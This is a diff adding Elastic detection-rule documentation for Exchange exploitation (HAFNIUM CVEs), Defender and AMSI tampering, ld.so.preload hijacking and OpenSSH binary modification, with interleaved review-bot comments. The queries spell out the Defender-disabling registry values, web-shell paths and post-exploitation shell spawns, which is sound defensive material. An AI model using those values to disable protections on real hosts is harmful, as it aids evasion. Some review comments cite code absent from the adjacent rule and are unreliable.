a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc new file mode 100644 index 0000000000..51dfa31da1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc 
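Review bot: in the query, `process.pe.original_file_name == "MSBuild.exe"` is a case-sensitive string comparison in EQL, while the exclusion `not process.name : "MSBuild.exe"` is case-insensitive; if the PE metadata is recorded with different casing the rule silently stops matching. Using `:` on both sides keeps the comparison consistent with the sibling rules in this package, which match `process.pe.original_file_name:"MSBuild.exe"`. One more point on the guide: the osquery steps under "Examine the host for derived artifacts" assume Osquery Manager is deployed on the host, which the note above them about the Osquery Markdown Plugin does not say.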
@@ -0,0 +1,92 @@ +[[prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes]] +=== Microsoft Exchange Server UM Spawning Suspicious Processes + +Identifies suspicious processes being spawned by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26857. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers +* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("UMService.exe", "UMWorkerProcess.exe") and + not process.executable : + ("?:\\Windows\\System32\\werfault.exe", + "?:\\Windows\\System32\\wermgr.exe", + "?:\\Program Files\\Microsoft\\Exchange Server\\V??\\Bin\\UMWorkerProcess.exe", + "D:\\Exchange 2016\\Bin\\UMWorkerProcess.exe", + "E:\\ExchangeServer\\Bin\\UMWorkerProcess.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: 
TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc new file mode 100644 index 0000000000..f88a0cc7fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc 
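Review bot: the exclusion list hard-codes two site-specific install paths, `"D:\\Exchange 2016\\Bin\\UMWorkerProcess.exe"` and `"E:\\ExchangeServer\\Bin\\UMWorkerProcess.exe"`, which do not belong in a prebuilt rule shipped to every deployment; a wildcard such as `"?:\\*\\Bin\\UMWorkerProcess.exe"` or a per-deployment rule exception covers them without baking one environment's disk layout into the package. These are also path-only allowlists, so anything the UM service launches from such a path is suppressed; if the data source exposes code-signing fields, a signer condition on the excluded executables would close that gap. The Investigation guide block is empty while the sibling "UM Writing Suspicious Files" rule carries one; the same Microsoft baselines link applies here.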
@@ -0,0 +1,104 @@ +[[prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files]] +=== Microsoft Exchange Server UM Writing Suspicious Files + +Identifies suspicious files being written by the Microsoft Exchange Server Unified Messaging (UM) service. This activity has been observed exploiting CVE-2021-26858. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers +* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +Positive hits can be checked against the established Microsoft [baselines](https://github.com/microsoft/CSS-Exchange/tree/main/Security/Baselines). + +Microsoft highly recommends that the best course of action is patching, but this may not protect already compromised systems +from existing intrusions. 
Other tools for detecting and mitigating can be found within their Exchange support +[repository](https://github.com/microsoft/CSS-Exchange/tree/main/Security) +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + process.name : ("UMWorkerProcess.exe", "umservice.exe") and + file.extension : ("php", "jsp", "js", "aspx", "asmx", "asax", "cfm", "shtml") and + ( + file.path : "?:\\inetpub\\wwwroot\\aspnet_client\\*" or + + (file.path : "?:\\*\\Microsoft\\Exchange Server*\\FrontEnd\\HttpProxy\\owa\\auth\\*" and + not (file.path : "?:\\*\\Microsoft\\Exchange Server*\\FrontEnd\\HttpProxy\\owa\\auth\\version\\*" or + file.name : ("errorFE.aspx", "expiredpassword.aspx", "frowny.aspx", "GetIdToken.htm", "logoff.aspx", + "logon.aspx", "OutlookCN.aspx", "RedirSuiteServiceProxy.aspx", "signout.aspx"))) or + + (file.path : "?:\\*\\Microsoft\\Exchange Server*\\FrontEnd\\HttpProxy\\ecp\\auth\\*" and + not file.name : "TimeoutLogoff.aspx") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Exploitation of Remote Services +** ID: T1210 +** Reference URL: https://attack.mitre.org/techniques/T1210/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc new file mode 100644 index 0000000000..f4e39a6551 
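Review bot: the extension list `file.extension : ("php", "jsp", "js", "aspx", "asmx", "asax", "cfm", "shtml")` omits `asp` and `ashx`, both of which IIS executes and which are used for web shells as readily as `aspx`; consider adding them. Minor: `process.name : ("UMWorkerProcess.exe", "umservice.exe")` uses a different casing from the sibling rule's `"UMService.exe"` (harmless with `:`, but worth aligning), and the guide text reads awkwardly ("Microsoft highly recommends that the best course of action is patching" and a closing sentence with no period); "Microsoft recommends patching first, but patching does not remediate an existing intrusion" says the same thing more clearly.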
--- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc 
@@ -0,0 +1,95 @@ +[[prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes]] +=== Microsoft Exchange Worker Spawning Suspicious Processes + +Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers +* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities +* https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "w3wp.exe" and process.parent.args : "MSExchange*AppPool" and + (process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") or + process.pe.original_file_name in ("cmd.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: 
https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc new file mode 100644 index 0000000000..b343e44723 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc 
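Review bot: in the query, `process.pe.original_file_name in ("cmd.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe")` uses `in`, which is case-sensitive in EQL, next to the case-insensitive `process.name :` branch; the OriginalFilename strings embedded in these binaries are not all lowercase (cmd.exe carries `Cmd.Exe`, for example), so the fallback meant to catch a renamed shell may never fire. Use `in~` for case-insensitive membership, or `:` with the same list. The Investigation guide block is empty even though the references include an Elastic discuss thread on HAFNIUM detection and response; a summary of its triage steps belongs here.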
@@ -0,0 +1,146 @@ +[[prebuilt-rule-8-10-5-microsoft-windows-defender-tampering]] +=== Microsoft Windows Defender Tampering + +Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ +* https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html +* https://www.tenforums.com/tutorials/104025-turn-off-core-isolation-memory-integrity-windows-10-a.html +* https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html +* https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html +* https://www.tenforums.com/tutorials/51514-turn-off-microsoft-defender-periodic-scanning-windows-10-a.html +* https://www.tenforums.com/tutorials/3569-turn-off-real-time-protection-microsoft-defender-antivirus.html +* https://www.tenforums.com/tutorials/99576-how-schedule-scan-microsoft-defender-antivirus-windows-10-a.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Microsoft Windows Defender Tampering + +Microsoft Windows Defender 
is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks. + +This rule monitors the registry for modifications that disable Windows Defender features. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine which features have been disabled, and check if this operation is done under change management and approved according to the organization's policy. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed. + +### Related rules + +- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb +- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Take actions to restore the appropriate Windows Defender antivirus configurations. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\PUAProtection" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Features\\TamperProtection" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIntrusionPreventionSystem" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScriptScanning" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting\\DisableEnhancedNotifications" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\SpyNet\\DisableBlockAtFirstSeen" and + registry.data.strings : ("1", "0x00000001")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\SpyNet\\SpynetReporting" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\SpyNet\\SubmitSamplesConsent" and + registry.data.strings : ("0", "0x00000000")) or + (registry.path : "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring" and + registry.data.strings : ("1", "0x00000001")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ 
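Review bot: operator precedence in the rule query makes the leading `host.os.type == "windows" and event.type in ("creation", "change")` apply only to the first branch (`PUAProtection`); `and` binds tighter than `or` in EQL, so every later `(registry.path : ... and registry.data.strings : ...)` branch matches on any event type, deletions included, and on any OS value. Wrap the whole chain of `or` branches in one pair of parentheses after the `and`. Minor: the remediation step "Take actions to restore the appropriate Windows Defender antivirus configurations" is vague next to a query that names fourteen specific values; listing the values to reset (or pointing at the Policies key paths above) is more actionable.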
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc new file mode 100644 index 0000000000..9ef0b60fb6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc 
@@ -0,0 +1,137 @@ +[[prebuilt-rule-8-10-5-modification-of-amsienable-registry-key]] +=== Modification of AmsiEnable Registry Key + +Identifies modifications of the AmsiEnable registry key to 0, which disables the Antimalware Scan Interface (AMSI). An adversary can modify this key to disable AMSI protections. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://hackinparis.com/data/slides/2019/talks/HIP2019-Dominic_Chell-Cracking_The_Perimeter_With_Sharpshooter.pdf +* https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Modification of AmsiEnable Registry Key + +The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell. + +Since AMSI is widely used across security products for increased visibility, attackers can disable it to evade detections that rely on it. + +This rule monitors the modifications to the Software\Microsoft\Windows Script\Settings\AmsiEnable registry key. 
+ +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the execution of scripts and macros after the registry modification. +- Retrieve scripts or Microsoft Office files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Use process name, command line, and file hash to search for occurrences on other hosts. + +### False positive analysis + +- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections. + +### Related rules + +- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. 
+ - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Delete or set the key to its default value. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + registry.path : ( + "HKEY_USERS\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable", + "HKU\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable" + ) and + registry.data.strings: ("0", "0x00000000") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ 
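Review bot: The description and investigation guide overstate what this key controls: `Software\Microsoft\Windows Script\Settings\AmsiEnable` only governs AMSI scanning for Windows Script Host (JScript/VBScript run through wscript.exe and cscript.exe), not PowerShell's AMSI integration, so "which disables the Antimalware Scan Interface (AMSI)" should read "which disables AMSI scanning for Windows Script Host". The remediation step "Delete or set the key to its default value" should also say what that default is: the value is absent by default and scanning is enabled unless it is explicitly 0, so deleting the value (or setting it to 1) restores scanning, which matches the `registry.data.strings: ("0", "0x00000000")` condition the query alerts on.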
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc new file mode 100644 index 0000000000..5a74bcd863 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc 
@@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object]] +=== Modification of Dynamic Linker Preload Shared Object + +Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 207 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:file and event.action:(updated or renamed or rename) and +not event.type:deletion and file.path:/etc/ld.so.preload + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ 
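Review bot: The action list `event.action:(updated or renamed or rename)` has no creation action, yet the normal state of a host is that /etc/ld.so.preload does not exist, so the most common malicious case is an attacker creating it for the first time; that write is only caught if the sensor also reports a follow-up update. The "Network Connection via Recently Compiled Executable" rule in this same patch matches file events with `event.action == "creation"`, so the same value (and `created` for auditbeat-*) should be added here, and the `not event.type:deletion` guard kept as is.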
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc new file mode 100644 index 0000000000..201fd2ccad --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc 
@@ -0,0 +1,101 @@ +[[prebuilt-rule-8-10-5-modification-of-openssh-binaries]] +=== Modification of OpenSSH Binaries + +Adversaries may modify SSH related binaries for persistence or credential access by patching sensitive functions to enable unauthorized access or by logging SSH credentials for exfiltration. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.angelalonso.es/2016/09/anatomy-of-real-linux-intrusion-part-ii.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Persistence +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and host.os.type:linux and event.type:change and + process.name:(* and not (dnf or dnf-automatic or dpkg or yum or rpm or yum-cron or anacron)) and + (file.path:(/usr/bin/scp or + /usr/bin/sftp or + /usr/bin/ssh or + /usr/sbin/sshd) or + file.name:libkeyutils.so) and + not process.executable:/usr/share/elasticsearch/* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: 
https://attack.mitre.org/techniques/T1556/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ +* Technique: +** Name: Remote Service Session Hijacking +** ID: T1563 +** Reference URL: https://attack.mitre.org/techniques/T1563/ +* Sub-technique: +** Name: SSH Hijacking +** ID: T1563.001 +** Reference URL: https://attack.mitre.org/techniques/T1563/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc new file mode 100644 index 0000000000..389dac1311 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc 
